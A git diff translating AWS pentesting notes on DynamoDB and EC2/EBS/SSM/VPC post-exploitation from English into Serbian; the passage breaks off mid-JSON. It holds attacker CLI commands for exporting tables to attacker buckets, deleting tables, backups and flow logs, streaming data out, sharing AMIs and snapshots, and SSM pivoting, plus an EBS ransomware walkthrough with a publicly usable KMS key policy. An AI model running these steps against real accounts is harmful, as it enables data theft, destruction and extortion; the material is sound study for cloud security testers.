+**Potencijalni uticaj:** Indirektni privesc lociranjem osetljivih informacija u tabeli
 
 ### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
 
-This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
-
+Ova dozvola će omogućiti napadaču da **izveze celu tabelu u S3 kantu** po njegovom izboru:
 ```bash
 aws dynamodb export-table-to-point-in-time \
-    --table-arn arn:aws:dynamodb:::table/TargetTable \
-    --s3-bucket  \
-    --s3-prefix  \
-    --export-time  \
-    --region 
+--table-arn arn:aws:dynamodb:::table/TargetTable \
+--s3-bucket  \
+--s3-prefix  \
+--export-time  \
+--region 
 ```
-
-Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
-
+Napomena da za ovo da bi radilo, tabela treba da ima omogućenu point-in-time-recovery, možete proveriti da li tabela to ima sa:
 ```bash
 aws dynamodb describe-continuous-backups \
-  --table-name 
+--table-name 
 ```
-
-If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
-
+Ako nije omogućeno, moraćete da **omogućite** to, a za to vam je potrebna **`dynamodb:ExportTableToPointInTime`** dozvola:
 ```bash
 aws dynamodb update-continuous-backups \
-    --table-name  \
-    --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
+--table-name  \
+--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potencijalni uticaj:** Indirektni privesc lociranjem osetljivih informacija u tabeli
 
 ### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
 
-With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
-
+Sa ovim dozvolama, napadač bi mogao da **napravi novu tabelu iz rezervne kopije** (ili čak da napravi rezervnu kopiju koju bi zatim obnovio u drugoj tabeli). Zatim, sa potrebnim dozvolama, mogao bi da proveri **informacije** iz rezervnih kopija koje **više ne bi mogle biti u produkcijskoj** tabeli.
 ```bash
 aws dynamodb restore-table-from-backup \
-    --backup-arn  \
-    --target-table-name  \
-    --region 
+--backup-arn  \
+--target-table-name  \
+--region 
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table backup
+**Potencijalni uticaj:** Indirektno privesc lociranjem osetljivih informacija u rezervnoj kopiji tabele
 
 ### `dynamodb:PutItem`
 
-This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
+Ova dozvola omogućava korisnicima da dodaju **novi predmet u tabelu ili zamene postojeći predmet** novim predmetom. Ako predmet sa istim primarnim ključem već postoji, **ceo predmet će biti zamenjen** novim predmetom. Ako primarni ključ ne postoji, novi predmet sa navedenim primarnim ključem će biti **kreiran**.
 
 {{#tabs }}
 {{#tab name="XSS Example" }}
-
 ```bash
 ## Create new item with XSS payload
 aws dynamodb put-item --table  --item file://add.json
 ### With add.json:
 {
-   "Id": {
-      "S": "1000"
-   },
-   "Name": {
-      "S":  "Marc"
-   },
-   "Description": {
-       "S": ""
-   }
+"Id": {
+"S": "1000"
+},
+"Name": {
+"S":  "Marc"
+},
+"Description": {
+"S": ""
+}
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="AI Example" }}
-
+{{#tab name="AI Primer" }}
 ```bash
 aws dynamodb put-item \
-    --table-name ExampleTable \
-    --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
-    --region 
+--table-name ExampleTable \
+--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
+--region 
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Potencijalni uticaj:** Eksploatacija daljih ranjivosti/zaobilaženja omogućavanjem dodavanja/modifikacije podataka u DynamoDB tabeli
 
 ### `dynamodb:UpdateItem`
 
-This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.
+Ova dozvola omogućava korisnicima da **modifikuju postojeće atribute stavke ili dodaju nove atribute stavci**. Ona **ne zamenjuje** celu stavku; samo ažurira specificirane atribute. Ako primarni ključ ne postoji u tabeli, operacija će **napraviti novu stavku** sa specificiranim primarnim ključem i postaviti atribute navedene u izrazu za ažuriranje.
 
 {{#tabs }}
 {{#tab name="XSS Example" }}
-
 ```bash
 ## Update item with XSS payload
 aws dynamodb update-item --table  \
-    --key file://key.json --update-expression "SET Description = :value" \
-    --expression-attribute-values file://val.json
+--key file://key.json --update-expression "SET Description = :value" \
+--expression-attribute-values file://val.json
 ### With key.json:
 {
-    "Id": {
-        "S": "1000"
-    }
+"Id": {
+"S": "1000"
+}
 }
 ### and val.json
 {
-    ":value": {
-        "S": ""
-    }
+":value": {
+"S": ""
+}
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="AI Example" }}
-
+{{#tab name="AI Primer" }}
 ```bash
 aws dynamodb update-item \
-    --table-name ExampleTable \
-    --key '{"Id": {"S": "1"}}' \
-    --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
-    --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
-    --region 
+--table-name ExampleTable \
+--key '{"Id": {"S": "1"}}' \
+--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
+--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
+--region 
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+**Potencijalni uticaj:** Iskorišćavanje daljih ranjivosti/zaobilaženja omogućavanjem dodavanja/modifikacije podataka u DynamoDB tabeli
 
 ### `dynamodb:DeleteTable`
 
-An attacker with this permission can **delete a DynamoDB table, causing data loss**.
-
+Napadač sa ovom dozvolom može **izbrisati DynamoDB tabelu, uzrokujući gubitak podataka**.
 ```bash
 aws dynamodb delete-table \
-    --table-name TargetTable \
-    --region 
+--table-name TargetTable \
+--region 
 ```
-
-**Potential impact**: Data loss and disruption of services relying on the deleted table.
+**Potencijalni uticaj**: Gubitak podataka i prekid usluga koje se oslanjaju na obrisanu tabelu.
 
 ### `dynamodb:DeleteBackup`
 
-An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.
-
+Napadač sa ovom dozvolom može **obrisati DynamoDB rezervnu kopiju, potencijalno uzrokujući gubitak podataka u slučaju scenarija oporavka od katastrofe**.
 ```bash
 aws dynamodb delete-backup \
-    --backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \
-    --region 
+--backup-arn arn:aws:dynamodb:::table/TargetTable/backup/BACKUP_ID \
+--region 
 ```
-
-**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario.
+**Potencijalni uticaj**: Gubitak podataka i nemogućnost oporavka iz rezervne kopije tokom scenarija oporavka od katastrofe.
 
 ### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`
 
 > [!NOTE]
-> TODO: Test if this actually works
+> TODO: Testirati da li ovo zapravo funkcioniše
 
-An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.
-
-1. Enable a stream on a DynamoDB table:
+Napadač sa ovim dozvolama može **omogućiti stream na DynamoDB tabeli, ažurirati tabelu da započne strimovanje promena, a zatim pristupiti streamu kako bi pratio promene na tabeli u realnom vremenu**. Ovo omogućava napadaču da prati i exfiltrira promene podataka, što može dovesti do curenja podataka.
 
+1. Omogućiti stream na DynamoDB tabeli:
 ```bash
 bashCopy codeaws dynamodb update-table \
-    --table-name TargetTable \
-    --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
-    --region 
+--table-name TargetTable \
+--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
+--region 
 ```
-
-2. Describe the stream to obtain the ARN and other details:
-
+2. Opišite tok za dobijanje ARN-a i drugih detalja:
 ```bash
 bashCopy codeaws dynamodb describe-stream \
-    --table-name TargetTable \
-    --region 
+--table-name TargetTable \
+--region 
 ```
-
-3. Get the shard iterator using the stream ARN:
-
+3. Dobijte shard iterator koristeći stream ARN:
 ```bash
 bashCopy codeaws dynamodbstreams get-shard-iterator \
-    --stream-arn  \
-    --shard-id  \
-    --shard-iterator-type LATEST \
-    --region 
+--stream-arn  \
+--shard-id  \
+--shard-iterator-type LATEST \
+--region 
 ```
-
-4. Use the shard iterator to access and exfiltrate data from the stream:
-
+4. Koristite shard iterator za pristup i eksfiltraciju podataka iz struje:
 ```bash
 bashCopy codeaws dynamodbstreams get-records \
-    --shard-iterator  \
-    --region 
+--shard-iterator  \
+--region 
 ```
-
-**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes.
+**Potencijalni uticaj**: Praćenje u realnom vremenu i curenje podataka o promenama u DynamoDB tabeli.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
index 9ae6a0a4f..403df4570 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
@@ -4,7 +4,7 @@
 
 ## EC2 & VPC
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,10 +12,10 @@ For more information check:
 
 ### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule`
 
-VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.\
-An attacker could abuse this to capture all the traffic and obtain sensitive information from it:
+VPC traffic mirroring **duplira ulazni i izlazni saobraćaj za EC2 instance unutar VPC** bez potrebe za instaliranjem bilo čega na samim instancama. Ovaj duplirani saobraćaj bi obično bio poslat nečemu poput sistema za detekciju mrežnih upada (IDS) radi analize i nadgledanja.\
+Napadač bi mogao da iskoristi ovo da uhvati sav saobraćaj i dobije osetljive informacije iz njega:
 
-For more information check this page:
+Za više informacija pogledajte ovu stranicu:
 
 {{#ref}}
 aws-malicious-vpc-mirror.md
@@ -23,8 +23,7 @@ aws-malicious-vpc-mirror.md
 
 ### Copy Running Instance
 
-Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**:
-
+Instance obično sadrže neku vrstu osetljivih informacija. Postoje različiti načini da se uđe unutra (proverite [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). Međutim, drugi način da se proveri šta sadrži je da se **napravi AMI i pokrene nova instanca (čak i na vašem vlastitom nalogu) iz nje**:
 ```shell
 # List instances
 aws ec2 describe-images
@@ -48,11 +47,10 @@ aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "
 aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
 ```
-
 ### EBS Snapshot dump
 
-**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\
-If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account:
+**Snapshot-i su rezervne kopije volumena**, koje obično sadrže **osetljive informacije**, stoga njihovo proveravanje treba da otkrije ove informacije.\
+Ako pronađete **volumen bez snapshot-a**, možete: **Kreirati snapshot** i izvršiti sledeće radnje ili jednostavno **montirati ga u instancu** unutar naloga:
 
 {{#ref}}
 aws-ebs-snapshot-dump.md
@@ -62,197 +60,178 @@ aws-ebs-snapshot-dump.md
 
 #### DNS Exfiltration
 
-Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**.
+Čak i ako zaključate EC2 tako da nijedan saobraćaj ne može da izađe, još uvek može **da exfiltrira putem DNS-a**.
 
-- **VPC Flow Logs will not record this**.
-- You have no access to AWS DNS logs.
-- Disable this by setting "enableDnsSupport" to false with:
+- **VPC Flow Logs neće ovo zabeležiti**.
+- Nemate pristup AWS DNS logovima.
+- Onemogućite ovo postavljanjem "enableDnsSupport" na false sa:
 
-  `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id `
+`aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id `
 
 #### Exfiltration via API calls
 
-An attacker could call API endpoints of an account controlled by him. Cloudtrail will log this calls and the attacker will be able to see the exfiltrate data in the Cloudtrail logs.
+Napadač bi mogao da pozove API krajnje tačke naloga koji kontroliše. Cloudtrail će zabeležiti ove pozive i napadač će moći da vidi exfiltrirane podatke u Cloudtrail logovima.
 
 ### Open Security Group
 
-You could get further access to network services by opening ports like this:
-
+Možete dobiti dalji pristup mrežnim uslugama otvaranjem portova na sledeći način:
 ```bash
 aws ec2 authorize-security-group-ingress --group-id  --protocol tcp --port 80 --cidr 0.0.0.0/0
 # Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC
 ```
-
 ### Privesc to ECS
 
-It's possible to run an EC2 instance an register it to be used to run ECS instances and then steal the ECS instances data.
+Moguće je pokrenuti EC2 instancu i registrovati je za korišćenje u pokretanju ECS instanci, a zatim ukrasti podatke iz ECS instanci.
 
-For [**more information check this**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs).
-
-### Remove VPC flow logs
+Za [**više informacija proverite ovo**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs).
 
+### Ukloni VPC tok logove
 ```bash
 aws ec2 delete-flow-logs --flow-log-ids  --region 
 ```
-
 ### SSM Port Forwarding
 
 Required permissions:
 
 - `ssm:StartSession`
 
-In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs.
-One of the scenarios where this is useful is pivoting from a [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) to a private EKS cluster.
+Pored izvršavanja komandi, SSM omogućava tunelovanje saobraćaja što se može zloupotrebiti za preusmeravanje sa EC2 instanci koje nemaju mrežni pristup zbog Security Groups ili NACLs. Jedan od scenarija gde je ovo korisno je preusmeravanje sa [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) na privatni EKS klaster.
 
-> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
-
-1. Install the SessionManagerPlugin on your machine
-2. Log in to the Bastion EC2 using the following command:
+> Da biste započeli sesiju, potrebno je da imate instaliran SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
 
+1. Instalirajte SessionManagerPlugin na vašem računaru
+2. Prijavite se na Bastion EC2 koristeći sledeću komandu:
 ```shell
 aws ssm start-session --target "$INSTANCE_ID"
 ```
-
-3. Get the Bastion EC2 AWS temporary credentials with the [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) script
-4. Transfer the credentials to your own machine in the `$HOME/.aws/credentials` file as `[bastion-ec2]` profile
-5. Log in to EKS as the Bastion EC2:
-
+3. Dobijte privremene akreditive za Bastion EC2 AWS pomoću [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) skripte  
+4. Prenesite akreditive na svoju mašinu u `$HOME/.aws/credentials` datoteci kao `[bastion-ec2]` profil  
+5. Prijavite se na EKS kao Bastion EC2:
 ```shell
 aws eks update-kubeconfig --profile bastion-ec2 --region  --name 
 ```
-
-6. Update the `server` field in `$HOME/.kube/config` file to point to `https://localhost`
-7. Create an SSM tunnel as follows:
-
+6. Ažurirajte polje `server` u datoteci `$HOME/.kube/config` da pokazuje na `https://localhost`
+7. Kreirajte SSM tunel na sledeći način:
 ```shell
 sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":[""],"portNumber":["443"], "localPortNumber":["443"]}' --region 
 ```
-
-8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running:
-
+8. Saobraćaj iz `kubectl` alata se sada prosleđuje kroz SSM tunel putem Bastion EC2 i možete pristupiti privatnom EKS klasteru sa svog računara pokretanjem:
 ```shell
 kubectl get pods --insecure-skip-tls-verify
 ```
+Napomena da će SSL veze propasti osim ako ne postavite `--insecure-skip-tls-verify` flag (ili njegov ekvivalent u K8s audit alatima). S obzirom na to da je saobraćaj tunelovan kroz sigurni AWS SSM tunel, sigurni ste od bilo kakvih MitM napada.
 
-Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks.
-
-Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.
+Na kraju, ova tehnika nije specifična za napad na privatne EKS klastere. Možete postaviti proizvoljne domene i portove da se prebacite na bilo koju drugu AWS uslugu ili prilagođenu aplikaciju.
 
 ### Share AMI
-
 ```bash
 aws ec2 modify-image-attribute --image-id  --launch-permission "Add=[{UserId=}]" --region 
 ```
+### Pretraživanje osetljivih informacija u javnim i privatnim AMI-ima
 
-### Search sensitive information in public and private AMIs
-
-- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data.
-
-### Share EBS Snapshot
+- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel je alat dizajniran za **pretraživanje osetljivih informacija unutar javnih ili privatnih Amazon Machine Images (AMIs)**. Automatizuje proces pokretanja instanci iz ciljanih AMI-a, montiranja njihovih volumena i skeniranja za potencijalne tajne ili osetljive podatke.
 
+### Podeli EBS Snapshot
 ```bash
 aws ec2 modify-snapshot-attribute --snapshot-id  --create-volume-permission "Add=[{UserId=}]" --region 
 ```
-
 ### EBS Ransomware PoC
 
-A proof of concept similar to the Ransomware demonstration demonstrated in the S3 post-exploitation notes. KMS should be renamed to RMS for Ransomware Management Service with how easy it is to use to encrypt various AWS services using it.
-
-First from an 'attacker' AWS account, create a customer managed key in KMS. For this example we'll just have AWS manage the key data for me, but in a realistic scenario a malicious actor would retain the key data outside of AWS' control. Change the key policy to allow for any AWS account Principal to use the key. For this key policy, the account's name was 'AttackSim' and the policy rule allowing all access is called 'Outside Encryption'
+Dokaz koncepta sličan demonstraciji Ransomware prikazanoj u beleškama o post-ekspolataciji S3. KMS bi trebalo preimenovati u RMS za Ransomware Management Service s obzirom na to koliko je lako koristiti ga za enkripciju raznih AWS usluga.
 
+Prvo, iz 'napadačkog' AWS naloga, kreirajte ključ koji korisnik upravlja u KMS-u. Za ovaj primer ćemo samo dozvoliti AWS-u da upravlja podacima o ključu za mene, ali u realističnom scenariju, zlonamerna osoba bi zadržala podatke o ključu van AWS-ove kontrole. Promenite politiku ključa da dozvoli bilo kojem AWS nalogu Principal da koristi ključ. Za ovu politiku ključa, ime naloga je bilo 'AttackSim', a pravilo politike koje omogućava sve pristupe se zove 'Outside Encryption'
 ```
 {
-    "Version": "2012-10-17",
-    "Id": "key-consolepolicy-3",
-    "Statement": [
-        {
-            "Sid": "Enable IAM User Permissions",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
-            },
-            "Action": "kms:*",
-            "Resource": "*"
-        },
-        {
-            "Sid": "Allow access for Key Administrators",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-            },
-            "Action": [
-                "kms:Create*",
-                "kms:Describe*",
-                "kms:Enable*",
-                "kms:List*",
-                "kms:Put*",
-                "kms:Update*",
-                "kms:Revoke*",
-                "kms:Disable*",
-                "kms:Get*",
-                "kms:Delete*",
-                "kms:TagResource",
-                "kms:UntagResource",
-                "kms:ScheduleKeyDeletion",
-                "kms:CancelKeyDeletion"
-            ],
-            "Resource": "*"
-        },
-        {
-            "Sid": "Allow use of the key",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-            },
-            "Action": [
-                "kms:Encrypt",
-                "kms:Decrypt",
-                "kms:ReEncrypt*",
-                "kms:GenerateDataKey*",
-                "kms:DescribeKey"
-            ],
-            "Resource": "*"
-        },
-        {
-            "Sid": "Outside Encryption",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "*"
-            },
-            "Action": [
-                "kms:Encrypt",
-                "kms:Decrypt",
-                "kms:ReEncrypt*",
-                "kms:GenerateDataKey*",
-                "kms:DescribeKey",
-                "kms:GenerateDataKeyWithoutPlainText",
-                "kms:CreateGrant"
-            ],
-            "Resource": "*"
-        },
-        {
-            "Sid": "Allow attachment of persistent resources",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-            },
-            "Action": [
-                "kms:CreateGrant",
-                "kms:ListGrants",
-                "kms:RevokeGrant"
-            ],
-            "Resource": "*",
-            "Condition": {
-                "Bool": {
-                    "kms:GrantIsForAWSResource": "true"
-                }
-            }
-        }
-    ]
+"Version": "2012-10-17",
+"Id": "key-consolepolicy-3",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
+},
+"Action": "kms:*",
+"Resource": "*"
+},
+{
+"Sid": "Allow access for Key Administrators",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
+"kms:Create*",
+"kms:Describe*",
+"kms:Enable*",
+"kms:List*",
+"kms:Put*",
+"kms:Update*",
+"kms:Revoke*",
+"kms:Disable*",
+"kms:Get*",
+"kms:Delete*",
+"kms:TagResource",
+"kms:UntagResource",
+"kms:ScheduleKeyDeletion",
+"kms:CancelKeyDeletion"
+],
+"Resource": "*"
+},
+{
+"Sid": "Allow use of the key",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
+"kms:Encrypt",
+"kms:Decrypt",
+"kms:ReEncrypt*",
+"kms:GenerateDataKey*",
+"kms:DescribeKey"
+],
+"Resource": "*"
+},
+{
+"Sid": "Outside Encryption",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"kms:Encrypt",
+"kms:Decrypt",
+"kms:ReEncrypt*",
+"kms:GenerateDataKey*",
+"kms:DescribeKey",
+"kms:GenerateDataKeyWithoutPlainText",
+"kms:CreateGrant"
+],
+"Resource": "*"
+},
+{
+"Sid": "Allow attachment of persistent resources",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
+"kms:CreateGrant",
+"kms:ListGrants",
+"kms:RevokeGrant"
+],
+"Resource": "*",
+"Condition": {
+"Bool": {
+"kms:GrantIsForAWSResource": "true"
+}
+}
+}
+]
 }
 ```
-
-The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume:
+Pravila politike ključa treba da imaju omogućene sledeće stavke kako bi se omogućila upotreba za enkripciju EBS volumena:
 
 - `kms:CreateGrant`
 - `kms:Decrypt`
@@ -260,222 +239,214 @@ The key policy rule needs the following enabled to allow for the ability to use
 - `kms:GenerateDataKeyWithoutPlainText`
 - `kms:ReEncrypt`
 
-Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account.
+Sada sa javno dostupnim ključem za korišćenje. Možemo koristiti 'žrtvinu' račun koja ima nekoliko EC2 instanci pokrenutih sa neenkriptovanim EBS volumenima. Ovi EBS volumeni 'žrtvinske' računa su ono što cilјamo za enkripciju, ovaj napad se pretpostavlja da je izvršen na računu sa visokim privilegijama AWS.
 
 ![Pasted image 20231231172655](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/5b9a96cd-6006-4965-84a4-b090456f90c6) ![Pasted image 20231231172734](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4294289c-0dbd-4eb6-a484-60b4e4266459)
 
-Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e)
+Slično primeru S3 ransomware-a. Ovaj napad će kreirati kopije povezanih EBS volumena koristeći snimke, koristiti javno dostupni ključ iz 'napadačke' računa za enkripciju novih EBS volumena, zatim odvojiti originalne EBS volumene od EC2 instanci i obrisati ih, a zatim konačno obrisati snimke korišćene za kreiranje novokreiranih enkriptovanih EBS volumena. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e)
 
-This results in only encrypted EBS volumes left available in the account.
+To rezultira time da su u računu ostali samo enkriptovani EBS volumeni.
 
 ![Pasted image 20231231173338](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/eccdda58-f4b1-44ea-9719-43afef9a8220)
 
-Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now.
+Takođe je važno napomenuti da je skripta zaustavila EC2 instance kako bi odvojila i obrisala originalne EBS volumene. Originalni neenkriptovani volumeni su sada nestali.
 
 ![Pasted image 20231231173931](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/cc31a5c9-fbb4-4804-ac87-911191bb230e)
 
-Next, return to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy.
-
+Sledeće, vratite se na politiku ključa u 'napadačkom' računu i uklonite pravilo politike 'Vanjska enkripcija' iz politike ključa.
 ```json
 {
-  "Version": "2012-10-17",
-  "Id": "key-consolepolicy-3",
-  "Statement": [
-    {
-      "Sid": "Enable IAM User Permissions",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
-      },
-      "Action": "kms:*",
-      "Resource": "*"
-    },
-    {
-      "Sid": "Allow access for Key Administrators",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-      },
-      "Action": [
-        "kms:Create*",
-        "kms:Describe*",
-        "kms:Enable*",
-        "kms:List*",
-        "kms:Put*",
-        "kms:Update*",
-        "kms:Revoke*",
-        "kms:Disable*",
-        "kms:Get*",
-        "kms:Delete*",
-        "kms:TagResource",
-        "kms:UntagResource",
-        "kms:ScheduleKeyDeletion",
-        "kms:CancelKeyDeletion"
-      ],
-      "Resource": "*"
-    },
-    {
-      "Sid": "Allow use of the key",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-      },
-      "Action": [
-        "kms:Encrypt",
-        "kms:Decrypt",
-        "kms:ReEncrypt*",
-        "kms:GenerateDataKey*",
-        "kms:DescribeKey"
-      ],
-      "Resource": "*"
-    },
-    {
-      "Sid": "Allow attachment of persistent resources",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
-      },
-      "Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
-      "Resource": "*",
-      "Condition": {
-        "Bool": {
-          "kms:GrantIsForAWSResource": "true"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Id": "key-consolepolicy-3",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
+},
+"Action": "kms:*",
+"Resource": "*"
+},
+{
+"Sid": "Allow access for Key Administrators",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+},
+"Action": [
